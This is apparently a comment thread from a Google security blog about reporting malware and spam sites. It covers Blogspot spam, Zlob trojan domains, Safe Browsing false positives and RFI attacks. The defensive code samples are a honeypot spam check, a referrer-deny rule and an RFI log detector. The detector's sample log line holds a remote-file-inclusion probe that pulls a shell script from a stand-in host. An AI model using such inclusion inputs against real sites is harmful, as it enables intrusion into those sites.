32 comments :
I come with gifts :P
Just tossed together a custom button for Google's toolbar to make the reporting process a bit quicker.
"[The custom button] breaks down an eight click, one seek, one drag, and captcha entering process into two clicks and the captcha."
More info w/ install url
To be fair - you should at least acknowledge the Security Report that prompted you to enact this policy.
If something stimulates you into action - it is only ethical to give them credit
There is no great shame in learning from the criticism of others and accepting an oversight.
Here is the Report for Reference
We are all human.
Has Google considered protecting the interests of the majority of US users at the expense of a minority? From the main Google search page (not the advanced search), leave .cn and .ru domains out of the results by default. The downside is that the iThugs will keep registering under other domains. However, that will cost them time and profit. Also, their bot networks will have to go through the seeding process all over again, which will buy Google the time it needs to establish protection from the iThugs.
This is bad... the whole world relies on Google, and now Google is going bad!
I was a victim of this: a friend was using my box and opened malware sites referenced from Google...
It took me several days to disinfect my laptop!
I've written an article explaining the details of the malware that got in:
http://www.taranfx.com/msg/47.php
Asking for help against malware is certainly a good initiative. But why don't you ask for similar help against the horrendous number of domain squatters and their link farms? They are filling the Web with useless autogenerated garbage, and with material shamelessly stolen from legitimate sites. Lots of people would be glad to pitch in against them! But I won't hold my breath, seeing how Google instead encourages their shady practices...
If you have Zlob Trojan ActiveX malware domains, please forward them to admin at phsdl dot com so I can add them to
http://www.phsdl.net/project_honeypot.php
Then an Internet user will be able to search Google for "domainname.com spam" and the domain will be returned in the search results under PHSDL. The user can then take caution before going to that domain.
Igor Berger
PHSDL
Administrator
www.phsdl.net
Maybe you also need to make SURE you provide a good means for disputing reports. I got hit by your "stopbadware" system on my blog, which has NO malware anywhere, and it's been a month and I still haven't received clearance from Google.
Your one-way style of communications is unimpressive.
I run PHSDL, not StopBadware, but the best practices are similar.
On my incubation forum, spammers post messages with links to malware. If you click on those links, Zlob Trojan ActiveX malware will be downloaded to your computer.
Maybe the reason your blog got malware status from Google is that you left the malware posts on your blog.
You need to remove those posts right away.
I recommend adopting some kind of anti-spam filter technology that will prevent spammers from abusing your forum or blog.
PHSDL is one type of spam filter technology, but there are others, such as Akismet, Karma, CAPTCHA, a CSS fix, and renaming your blog submission fields in the script.
The method you use will depend on what type of comment spam you are trying to stop.
The PHSDL spam filter is primarily for stopping malware domain spam, while Akismet and Karma are broader and will stop off-topic spam, but they may also block real commenters from posting, because they are prone to false positives.
Please visit StopBadware.org and request to have your website reviewed.
http://www.stopbadware.org/home/reviewinfo?searchtext=organizers
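The "CSS fix" and field-renaming tricks mentioned above are often combined into a hidden "honeypot" check. A minimal sketch, assuming a generic form handler that receives POSTed fields as a dict; the field name `website_url` is a hypothetical decoy hidden with CSS (`display:none`), not an actual PHSDL field:

```python
# Sketch of a honeypot anti-spam check: humans never see the hidden
# decoy field, so they leave it empty; bots auto-fill every field.

def is_spam_submission(fields: dict) -> bool:
    """Return True if the submission looks like bot spam."""
    # A non-empty honeypot field gives a bot away.
    if fields.get("website_url", "").strip():
        return True
    # Renamed real fields: reject posts that still use the old names,
    # since only outdated bot scripts would submit them.
    legacy_names = {"comment", "author", "email"}
    if legacy_names & set(fields):
        return True
    return False

# A human leaves the hidden field empty:
print(is_spam_submission({"msg_body_x7": "Nice post!", "website_url": ""}))   # False
# A bot fills everything in:
print(is_spam_submission({"msg_body_x7": "buy pills",
                          "website_url": "http://spam.example"}))             # True
```

This blocks only unsophisticated bots, which is why the comment above pairs it with broader filters like Akismet.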
It is apparent to anyone using Google Blog Search that the bad guys are using Blogspot and Google Blog Search as a training ground for SEO and cache poisoning.
I recommend that Google take a more aggressive approach to cutting spam on Blogspot. Reporting spam found via Google Blog Search needs to be made much easier and to become a natural part of a Google Blog searcher's activities. An easy-to-find link for reporting spam would be a good start.
Currently, robots churn out huge numbers of blogs and blog posts in order to assess their search-term/search-position success. This needs to be foiled ASAP. On Blogspot, the rate at which blogs are created and posts are made needs to be throttled to a level that only humans can achieve.
Best of luck with your efforts on the security clampdown.
I second that! I am in Japan now, and my Windows language for non-Unicode programs is configured to Japanese because my mobile synchronization software requires it.
So all the links for Blogspot are in Japanese. I cannot read Japanese, so I do not know which link to click to report spam to Blogspot.
Actually, even before I switched the non-Unicode language to Japanese, I think the links were already in Japanese.
This is a very well documented problem that Blogspot refuses to address. Let the users choose the language!
Even reporting the bad accounts this way does not get them closed by Blogspot right away; the data is just compiled for algorithmic action.
As for security and spam prevention: Google Groups uses UnSpam data to block spam to Google Groups, so why can't Blogspot remove an account when a URL on it is flagged in the UnSpam Project Honey Pot database, after manual verification that it is abusive?
Blogspot is not user friendly!
This is useful and it is in English.
Report BlogSpot Spam to Google
I developed (and am still developing) a website called Engix (hosted at http://www.engix.co.uk) that lets people build campaigns with rich content using various GData APIs. There are always copyright issues involved, for example when using a photo from someone's public Picasa album. How can that be avoided? Can you include photo credits beside every photo you use and get away with it?
As you close the gaps on malware, copyright issues are not far behind and need to be addressed. They are (I think) even more important from a service provider's point of view. Correct me if I'm wrong.
Balamurali Menon
This is not exactly a security issue, but there needs to be an official Google blog to cover it. Who owns what is a very sensitive and debatable question, and for Google to get involved beyond the DMCA may not be feasible.
Please follow these Official Google links, which I think can help you.
Google Help Copyright
How to report copyright infringement to Google
How to report DMCA violation to Google
Google Help on DMCA
Thank you,
Igor
Thanks dude!!
Appreciated!
These are Zlob Trojan malware domain websites.
You can see them on the PHSDL malware and redirect domains public list:
PHSDL Malware and redirect domains public list
There is nothing anyone can do to stop these sites from linking to your website, but you can set up deny-by-referrer host access in your .htaccess file under Apache.
If you are going to deny all the domains on the PHSDL list, you will have to use a CGI script to do the processing, or a MySQL-backed include in your .htaccess.
But in your case, with only a few domains leeching off your site, just add them as denied in .htaccess.
Please look up the Apache syntax for doing so.
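For reference, the referrer-based denial described above can be done with mod_rewrite. A minimal sketch, assuming mod_rewrite is enabled; `badsite1.example` and `badsite2.example` are placeholder domains, not real entries from the PHSDL list:

```apache
# .htaccess: return 403 Forbidden to requests referred by listed domains.
RewriteEngine On
RewriteCond %{HTTP_REFERER} badsite1\.example [NC,OR]
RewriteCond %{HTTP_REFERER} badsite2\.example [NC]
RewriteRule .* - [F]
```

The `[NC]` flag makes the match case-insensitive, and `[F]` sends the 403 response. Note that referrer headers are trivially forged, so this only deters casual leeching.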
Thank you,
igor
Hi, the phishing-site submission page is returning a 404 error. Please confirm that you are receiving the submissions.
http://www.google.com/safebrowsing/report_phish/
Eric Appelboom
Recently I read about new threats here:
http://scforum.info/index.php/board,17.0.html
Keep on guys!!!
In addition to the sites that host malware targeted at web surfers, there are thousands of sites, including university and government sites, which host malicious scripts that are being used to attack OTHER WEBSITES via Remote File Inclusion (RFI) requests.
These scripts are unlikely to be encountered by either web surfers or Googlebot because they are hidden in the directory structures of their host servers and, by design, have no inbound links by which to find them. These host sites often aren't badware-flagged, but they should be because a) they are malicious, and b) in the case of hacked sites, the webmasters need to be notified.
The list of URLs of the remote scripts being used in RFI attacks on my small website in the past few months is close to reaching 1000 entries, and the daily number of new sites being used in the attacks is rapidly increasing.
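A list like this can be compiled straight from a site's access logs, because an RFI probe has a telltale shape: a full URL passed as the value of a query-string parameter. A minimal sketch; the log lines, the `page` parameter, and `evil.example` are hypothetical illustrations:

```python
import re

# Flag Remote File Inclusion (RFI) attempts in web access log lines:
# look for a query-string parameter whose value is itself a URL.
RFI_PATTERN = re.compile(r'\?[^\s"]*=(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_attempts(log_lines):
    """Return the log lines that look like RFI probes."""
    return [line for line in log_lines if RFI_PATTERN.search(line)]

sample = [
    '1.2.3.4 - - "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 404',
    '5.6.7.8 - - "GET /index.php?page=about HTTP/1.1" 200',
]
for hit in find_rfi_attempts(sample):
    print(hit)  # only the first line is flagged
```

The URLs extracted from the flagged lines are exactly the "quiet" script-hosting sites described above, which is why bulk reporting would be so useful.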
The problem? The reporting form at http://www.google.com/safebrowsing/report_badware/ only allows entering 1 website at a time.
Would it be possible to expand that form to a multi-line edit control so multiple sites can be reported at once? I have no objection to the captcha, but entering 1000 sites 1 at a time is out of the question. A one-at-a-time form cannot possibly be expected to deal with the volume of badware sites that actually exist. It basically acts as a barrier that inhibits reporting.
It would be impossible to misuse the form to try to damage an innocent website. There would be no harm done to any site with no badware on it. At worst, any abuse would only result in some extra crawling by the Google badware bots.
Going after these "quiet" malicious script-hosting sites is important because it is how most of the malicious sites are created that then go on to target end-users. If these script sites were dealt with more efficiently, it would come closer to attacking the real problem at its source.
Now we are talking; this is a good move from Google to fight back. The campaign against IFRAME attacks is still on. I've compiled a checklist for system admins to prevent the side effects of visiting malicious domains.
http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html
and
http://extremesecurity.blogspot.com/2008/03/ie-activex-security-101.html
good luck
Why not distribute a browser plugin that scans, warns the user and sends the url back to Google?
That way we all benefit and we all contribute.
I'd like to know where to go to report when a site is NOT a malware site for Google.
I keep getting a notice that my newspaper site's /local link is a "reported attack site," and EVERY time I go there to read my local news, I have to go through a "yes, this site is okay" link and then stop Firefox from preventing my page from loading. I don't want to turn off my filters for everything just so that I can read the online Seattle PI!
Where do I report that this site is legitimate?
Ripoff report downloads 2 hunks of malware and 1 trojan.
WARNING WARNING WARNING
There is a hidden worm/virus in a Flash download that appears if you click on one of "CNN's Top Ten Stories."
A quick check reveals the source to be somewhere in the Bahamas. This danger was first brought up by CNET a week or so ago.
Google should immediately shut down and delete all posts from "CNN Top Ten" that do not originate from CNN legitimately.
Charles
Google SafeBrowsing has False Positives!:
Our company site has been blocked when navigating with Google Chrome.
Last night and this morning we ran tests on the site that Google Safe Browsing flagged as containing malicious software, and I could not find evidence to corroborate the Google report. I have put together a brief summary for you.
[+] Scripts. Js with malicious code: NO
[+] Dynamic Content ASP: Safe
[+] SWF vulnerable to relaying attacks: NO
[+] Static content HTM: Safe
Additionally, we mounted a virtual machine on which we monitored processes, libraries, BHOs, Windows registry files, pipes, and connections.
After navigating the site, we found no evidence of malicious code in the virtual system. Moreover, all connections were relayed through an intermediate proxy for manual review, and no symptoms of infection were found.
Google how can we solve this....YOU ARE FALSELY BLOCKING OUR SITE!